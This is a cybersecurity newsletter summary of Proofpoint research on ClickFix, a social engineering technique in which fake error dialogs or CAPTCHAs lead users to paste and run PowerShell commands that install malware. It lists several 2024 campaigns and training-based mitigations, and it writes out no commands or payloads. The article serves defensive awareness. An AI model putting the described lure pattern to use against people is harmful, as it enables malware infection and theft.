skip to content
Decrypt LOL

Get Cyber-Smart in Just 5 Minutes a Week

Decrypt delivers quick and insightful updates on cybersecurity. No spam, no data sharing—just the info you need to stay secure.

Read the latest edition
Rise in ClickFix Social Engineering Technique Identified

Rise in ClickFix Social Engineering Technique Identified

/ 4 min read

stories , cybersecurity , malware , social engineering , threat intelligence , proofpoint

Quick take - Proofpoint researchers have reported a notable increase in the use of the ClickFix social engineering technique, which deceives users into executing malicious PowerShell commands through misleading dialogue boxes, with various campaigns linked to different malware types and impersonating well-known services.

Fast Facts

  • Rise of ClickFix: Proofpoint researchers report a significant increase in the ClickFix social engineering technique, linked to the initial access broker TA571 and the ClearFake threat cluster, first observed in early 2024.
  • Deceptive Execution: ClickFix tricks users into executing PowerShell commands through misleading dialogue boxes that present fake error messages, often impersonating well-known software like Microsoft Word and Google Chrome.
  • Malware Delivery: The technique has been associated with various malware types, including AsyncRAT and Danabot, and can originate from compromised websites, documents, and malicious URLs.
  • Recent Campaigns: Notable ClickFix campaigns include impersonation of GitHub security warnings and Swiss e-commerce notifications, both directing users to malicious sites to execute harmful commands.
  • Mitigation Recommendations: Organizations are advised to implement training focused on ClickFix to reduce exploitation risks, as many campaigns are financially motivated and lack clear attribution to known threat actors.

Rise of ClickFix Social Engineering Technique

Proofpoint researchers have identified a significant rise in the use of a social engineering technique known as ClickFix, which was first observed in early 2024. This technique is associated with the initial access broker TA571 and the ClearFake threat cluster.

How ClickFix Works

ClickFix is designed to deceive users into executing PowerShell commands that download malware. The method involves misleading dialogue boxes that present fake error messages, prompting users to “fix” the issue by executing malicious commands. Threat actors employing ClickFix have impersonated well-known software and services, including Microsoft Word and Google Chrome. The technique can originate from various sources, such as compromised websites, documents, HTML attachments, and malicious URLs.

In many instances, users encounter a dialog box suggesting an error, which provides instructions to either automatically copy a malicious script into PowerShell or require manual execution steps. Proofpoint has linked ClickFix campaigns to several types of malware, including AsyncRAT, Danabot, DarkGate, Lumma Stealer, and NetSupport.

Recent Campaigns and Variants

A recent variant of ClickFix uses a fake CAPTCHA, claiming to validate users, based on an open-source toolkit called reCAPTCHA Phish, released in mid-September 2024. Shortly after its release, this tool was detected in email threat data. Specific incidents involving ClickFix include a campaign reported on September 18, 2024, which used GitHub notifications to deliver malware. This campaign impersonated GitHub security warnings and directed users to a fraudulent site that utilized the reCAPTCHA Phish and ClickFix techniques to execute PowerShell commands.

Another campaign discovered in September 2024 targeted Swiss organizations, impersonating the Swiss e-commerce marketplace Ricardo. This campaign directed users to a malicious landing page instructing them to execute PowerShell commands that downloaded malware. On September 5, 2024, a campaign was identified where benign emails masqueraded as security updates, instructing users to run PowerShell commands. Additionally, on September 20, 2024, HTML attachments were used to deliver malware, displaying dialogue boxes that prompted the execution of PowerShell commands.

A malvertising campaign featuring ChatGPT-themed lures to distribute XWorm was observed in mid-October 2024. The malicious site claimed to be a ChatGPT prompt generator. A Ukrainian language ClickFix campaign targeting organizations in Ukraine was identified on October 31, 2024, utilizing the reCAPTCHA ClickFix techniques.

Mitigation and Recommendations

The growing popularity of ClickFix among financially motivated threat actors and suspected espionage groups highlights the technique’s exploitation of users’ desire to resolve issues independently, often resulting in bypassing security measures. Organizations are encouraged to implement training specifically focused on the ClickFix technique to mitigate risks of exploitation. Most observed ClickFix campaigns lack attribution to known threat actors, and many appear to have financially motivated objectives. Indicators of compromise related to these campaigns include various URLs and SHA256 hashes linked to malware payloads.

Original Source: Read the Full Article Here

Check out what's latest

New File Transfer Protocol Developed for Enhanced Security and Performance
New File Transfer Protocol Developed for Enhanced Security and Performance
Study Introduces Benchmark for Evaluating Cryptographic Protocols
Study Introduces Benchmark for Evaluating Cryptographic Protocols
Study Reveals Vulnerabilities of LLMs to Bit-Flip Attacks
Study Reveals Vulnerabilities of LLMs to Bit-Flip Attacks